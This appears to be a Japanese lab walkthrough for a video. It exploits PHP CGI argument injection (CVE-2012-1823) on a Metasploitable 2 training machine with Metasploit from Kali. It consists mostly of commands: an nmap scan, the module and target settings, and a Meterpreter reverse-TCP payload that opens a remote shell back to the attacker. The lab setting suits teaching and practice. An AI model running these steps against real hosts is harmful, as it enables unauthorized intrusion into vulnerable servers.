
このビデオでは、Kali Linux を使用して Metasploitable 2 サーバーに対する PHP CGI 引数インジェクション(CVE-2012-1823)の悪用が、Metasploit を使って実行されます。
KaliからMetasploitableのIPを特定します:
ip a
例:
Kali: 192.168.56.101
Metasploitable2: 192.168.56.102
ポートとサービスを確認します:
nmap -p 80 192.168.56.102
ブラウザでも確認できます:
msfconsole
search php cgi
正しいモジュール:
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS 192.168.56.102
set RPORT 80
set TARGETURI /
ペイロードを選択します:
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444
確認してみます:
show options
run
または
exploit
成功した場合:
Meterpreterセッション1が開かれました
sysinfo
whoami